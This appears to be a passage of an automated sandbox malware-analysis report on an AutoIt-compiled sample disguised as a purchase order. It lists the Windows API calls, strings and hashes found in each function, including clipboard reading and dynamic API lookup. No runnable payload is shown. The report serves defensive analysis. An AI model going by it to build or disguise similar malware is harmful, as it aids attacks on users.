                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                            • String ID: ($,$tooltips_class32
                                                            • API String ID: 225202481-3320066284
                                                            • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                            • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                                            • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                            • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                                            Function 0046DCB4 Relevance: 36.2, APIs: 24, Instructions: 247clipboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • OpenClipboard.USER32(?), ref: 0046DCE7
                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                            • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                            • CloseClipboard.USER32 ref: 0046DD0D
                                                            • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                            • CloseClipboard.USER32 ref: 0046DD41
                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                            • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                            • CloseClipboard.USER32 ref: 0046DD99
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                            • String ID:
                                                            • API String ID: 15083398-0
                                                            • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                            • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                                            • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                            • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                                            Function 00471BC9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 313windowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                            • GetWindowRect.USER32(?,?), ref: 00471CF7
                                                            • GetClientRect.USER32(?,?), ref: 00471D05
                                                            • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                                            • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                                            • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                                            • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                                            • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                                            • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                                            • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                                            • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                                            • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                                            • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                                            • GetClientRect.USER32(?,?), ref: 00471E8A
                                                            • GetStockObject.GDI32(00000011), ref: 00471EA6
                                                            • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                                            • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                            • String ID: @$AutoIt v3 GUI
                                                            • API String ID: 867697134-3359773793
                                                            • Opcode ID: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                            • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                                            • Opcode Fuzzy Hash: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                            • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                                                            Function 00433A13 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 196COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                            • API String ID: 1503153545-1459072770
                                                            • Opcode ID: 345ea3b045db0fb153e04d411e3cc3e2697e5fc8c1a2b807276d46bacdc8e81f
                                                            • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                                                            • Opcode Fuzzy Hash: 345ea3b045db0fb153e04d411e3cc3e2697e5fc8c1a2b807276d46bacdc8e81f
                                                            • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                                                            Function 00469296 Relevance: 33.4, APIs: 6, Strings: 13, Instructions: 116COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: __wcsicoll$__wcsnicmp
                                                            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                                            • API String ID: 790654849-32604322
                                                            • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                            • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                                            • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                            • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                                            Function 00455A89 Relevance: 31.9, APIs: 21, Instructions: 395COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 14722396dd2ddf06b3279b48e0a6d147a2eb40c4a0fa9ac624e4ce23469bd630
                                                            • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                                            • Opcode Fuzzy Hash: 14722396dd2ddf06b3279b48e0a6d147a2eb40c4a0fa9ac624e4ce23469bd630
                                                            • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                                            Function 0044870C Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 311COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Window
                                                            • String ID: 0
                                                            • API String ID: 2353593579-4108050209
                                                            • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                            • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                                            • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                            • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                                            Function 0044A032 Relevance: 31.7, APIs: 21, Instructions: 198windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSysColor.USER32(0000000F), ref: 0044A05E
                                                            • GetClientRect.USER32(?,?), ref: 0044A0D1
                                                            • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                                            • GetWindowDC.USER32(?), ref: 0044A0F6
                                                            • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                                            • ReleaseDC.USER32(?,?), ref: 0044A11B
                                                            • GetSysColor.USER32(0000000F), ref: 0044A131
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                                            • GetSysColor.USER32(0000000F), ref: 0044A14F
                                                            • GetSysColor.USER32(00000005), ref: 0044A15B
                                                            • GetWindowDC.USER32(?), ref: 0044A1BE
                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                                            • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                                            • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                                            • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                                            • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                                            • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                                            • GetSysColor.USER32(00000008), ref: 0044A265
                                                            • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                                            • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                                            • GetStockObject.GDI32(00000005), ref: 0044A28A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                            • String ID:
                                                            • API String ID: 1744303182-0
                                                            • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                            • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                                            • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                            • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                                            Function 00417C20 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                                            • __mtterm.LIBCMT ref: 00417C34
                                                              • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                                              • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                                              • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                                              • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                                            • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                                            • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                                            • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                                            • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                                            • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                                            • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                                            • __init_pointers.LIBCMT ref: 00417CE6
                                                            • __calloc_crt.LIBCMT ref: 00417D54
                                                            • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                            • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                            • API String ID: 4163708885-3819984048
                                                            • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                            • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                                            • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                            • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                                                            Function 0046E1A6 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 231COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: >>>AUTOIT SCRIPT<<<$\
                                                            • API String ID: 0-1896584978
                                                            • Opcode ID: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                            • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
                                                            • Opcode Fuzzy Hash: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                            • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99
                                                            Function 004341E6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 91windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: __wcsicoll$IconLoad
                                                            • String ID: blank$info$question$stop$warning
                                                            • API String ID: 2485277191-404129466
                                                            • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                            • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                                            • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                            • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                                            Function 00454639 Relevance: 25.7, APIs: 17, Instructions: 199windowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadIconW.USER32(?,00000063), ref: 0045464C
                                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                                            • SetWindowTextW.USER32(?,?), ref: 00454678
                                                            • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                                            • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                                            • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                                            • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                                            • GetWindowRect.USER32(?,?), ref: 004546F5
                                                            • SetWindowTextW.USER32(?,?), ref: 00454765
                                                            • GetDesktopWindow.USER32 ref: 0045476F
                                                            • GetWindowRect.USER32(00000000), ref: 00454776
                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                                            • GetClientRect.USER32(?,?), ref: 004547D2
                                                            • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                                            • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                            • String ID:
                                                            • API String ID: 3869813825-0
                                                            • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                            • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                                            • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                            • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                                            Function 004649A3 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 395COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 00464B28
                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                                            • _wcslen.LIBCMT ref: 00464C28
                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                                            • _wcslen.LIBCMT ref: 00464CBA
                                                            • _wcslen.LIBCMT ref: 00464CD0
                                                            • _wcslen.LIBCMT ref: 00464CEF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$Directory$CurrentSystem
                                                            • String ID: D
